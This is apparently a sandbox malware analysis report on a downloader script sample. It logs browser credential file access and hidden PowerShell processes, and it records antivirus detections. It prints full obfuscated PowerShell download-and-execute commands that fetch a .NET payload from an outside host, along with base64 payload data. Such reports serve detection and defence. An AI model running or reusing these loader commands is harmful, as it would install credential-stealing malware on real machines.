NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 7, 2023, 9:19 a.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.yba/55.94.011.97//:ptth'))"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 2748 thread_handle: 0x000002e8 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f0	1	1
ShellExecuteExW July 7, 2023, 9:19 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB5⁂GI⁂YQ⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW July 7, 2023, 9:19 a.m.	thread_identifier: 2884 thread_handle: 0x00000448 process_identifier: 2880 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.yba/55.94.011.97//:ptth'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000044c	1	1

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Symantec	ISB.Downloader!gen285
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Google	Detected
Ikarus	Trojan.VBS.Agent
AVG	Script:SNH-gen [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 7, 2023, 9:19 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	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
Data received	AGwAAAAiAAEAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAAAAUOQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Data received	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
